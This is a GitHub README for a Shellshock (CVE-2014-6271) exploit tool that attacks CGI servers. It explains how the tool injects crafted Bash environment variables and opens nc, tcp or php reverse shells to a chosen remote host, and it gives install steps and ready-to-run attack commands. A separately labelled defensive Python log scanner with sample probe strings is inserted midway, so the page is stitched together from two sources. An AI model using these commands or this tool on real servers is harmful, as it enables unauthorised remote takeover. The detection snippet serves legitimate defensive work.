MY7H404/CVE-2014-6271-Shellshock


Shellshock Exploit (CVE-2014-6271)

Description

The Shellshock Exploit is a tool designed to efficiently exploit the Shellshock vulnerability (CVE-2014-6271) in susceptible CGI servers, enabling a precise takeover of the target server. Shellshock is a critical security vulnerability that affects the Bash shell, allowing attackers to execute arbitrary commands on the targeted system.

Key Features

  • Exploit Automation: Automates the exploitation of the Shellshock vulnerability in CGI scripts, streamlining the process for penetration testing and security research.
  • Reverse Shell Connectivity: Provides options for establishing a reverse shell connection to the target server, supporting various methods such as Netcat (nc), TCP, and PHP.
  • Customizable Options: Allows users to specify the target host, CGI script, remote host for the reverse shell, port, and preferred shell method through command-line options.

CVE Information

  • CVE Number: CVE-2014-6271
  • CVE Description: Bash through 4.3 allows remote attackers to execute arbitrary commands via crafted environment variables passed to Bash scripts.

How it Works

  1. Identification of Vulnerable CGI Scripts:
    • The tool scans the specified host for potential CGI scripts that may be susceptible to the Shellshock vulnerability.
  2. Crafting Malicious Environment Variables:
    • Once vulnerable CGI scripts are identified, the tool generates specially crafted environment variables containing malicious commands.
  3. Exploiting Shellshock Vulnerability:
    • The crafted environment variables are injected into the CGI scripts, taking advantage of the Shellshock vulnerability in the Bash shell.
  4. Reverse Shell Connection:
    • The tool establishes a reverse shell connection to the specified remote host and port, providing the user with interactive access to the target system.
  5. User Interaction and Control:
    • The user can interact with the target system through the established reverse shell connection, allowing for further exploitation or analysis.
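Steps 2 and 3 leave a recognisable trace for defenders: CGI hands request headers to the script as environment variables, and an exported Bash function definition in an environment value begins with `() {`. The Python below is an added example, not code from this repository, that scans Apache combined-format access logs for that prefix; the log format, the constructed sample lines and the `find_shellshock_attempts` name are assumptions.

```python
import re

# An exported Bash function arrives as an environment value beginning "() {".
# CVE-2014-6271 is Bash running the text that trails the function body.
FUNC_PREFIX = re.compile(r"\(\)\s*\{")

def _quoted(name):
    # A double-quoted log field; Apache escapes embedded quotes as \"
    return r'"(?P<%s>(?:[^"\\]|\\.)*)"' % name

# Apache combined log format (assumed). It records only Referer and
# User-Agent, so other request headers are invisible to this check.
COMBINED = re.compile(
    r"^(?P<host>\S+) \S+ \S+ \[[^\]]+\] " + _quoted("request")
    + r" (?P<status>\d{3}) \S+ " + _quoted("referer") + " " + _quoted("agent") + "$"
)

# Constructed sample lines: documentation IP ranges, harmless echo marker.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Oct/2014:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Oct/2014:10:00:05 +0000] "GET /cgi/test HTTP/1.1" 200 41 "-" "() { :; }; echo constructed-probe"',
    '192.0.2.10 - - [01/Oct/2014:10:00:09 +0000] "GET /cgi/test HTTP/1.1" 200 41 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '203.0.113.44 - - [01/Oct/2014:10:00:12 +0000] "GET /cgi/test HTTP/1.1" 500 0 "() {:;}; echo constructed-probe" "-"',
    'garbled-entry Cookie: () { :; }; echo constructed-probe',
]

def find_shellshock_attempts(lines):
    """Return one finding per log line that carries the function prefix."""
    findings = []
    for lineno, raw in enumerate(lines, 1):
        m = COMBINED.match(raw.strip())
        if m is None:
            # Unparseable line: scan it whole rather than silently skip it.
            fields = ["unparsed"] if FUNC_PREFIX.search(raw) else []
        else:
            fields = [f for f in ("request", "referer", "agent")
                      if FUNC_PREFIX.search(m.group(f))]
        if fields:
            findings.append({
                "line": lineno,
                "host": m.group("host") if m else None,
                "status": m.group("status") if m else None,
                "fields": fields,
            })
    return findings

if __name__ == "__main__":
    for finding in find_shellshock_attempts(SAMPLE_LOG):
        print(finding)
```

A match records an attempt, not a compromise: the logged status does not show whether Bash ran the trailing text, so follow up by confirming the Bash version on the host that served the request.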


Requirements

Debian/Ubuntu

sudo apt-get install libcurl4-openssl-dev

Red Hat/Fedora

sudo dnf install libcurl-devel

macOS (Homebrew)

brew install curl-openssl

After installing the libcurl development package, clone the repository, install its Python dependencies, and run the tool:

git clone https://github.com/MY7H404/CVE-2014-6271-Shellshock.git
cd CVE-2014-6271-Shellshock
pip3 install -r requirements.txt
python3 shellshock.py -a HOST -u /cgi/test -r REMOTE -p 1337 -s tcp

Usage

python3 shellshock.py [-h] -a HOST -u URI -r REMOTE -p PORT [-s {nc,tcp,php}]

Options

-h, --help: Show help message and exit
-a HOST, --host HOST: Specify a remote host to test
-u URI, --uri URI: Specify a CGI script to test (e.g., /cgi/test)
-r REMOTE, --remote REMOTE: Specify the host for the reverse shell connection
-p PORT, --port PORT: Specify the port for the reverse shell connection
-s {nc,tcp,php}, --shell {nc,tcp,php}: Choose your preferred reverse shell method for seamless connectivity (default 'nc')

Example

python3 shellshock.py -a 10.10.10.10 -u /cgi/test -r localhost -p 4444 -s tcp

Disclaimer

This tool is created for educational and testing purposes only. The authors and contributors are not responsible for any illegal, unethical, or unauthorized use of this tool. Users are solely responsible for ensuring that their use of this tool complies with all applicable laws, regulations, and ethical standards.

Usage of this tool on systems or networks without explicit authorization is strictly prohibited. The authors and contributors disclaim any responsibility for any damage, loss of data, or other consequences resulting from the use of this tool.

By using this tool, you acknowledge that you have read, understood, and agree to abide by the terms of this disclaimer.

Use responsibly and ethically.

License

This project is licensed under the MIT License.
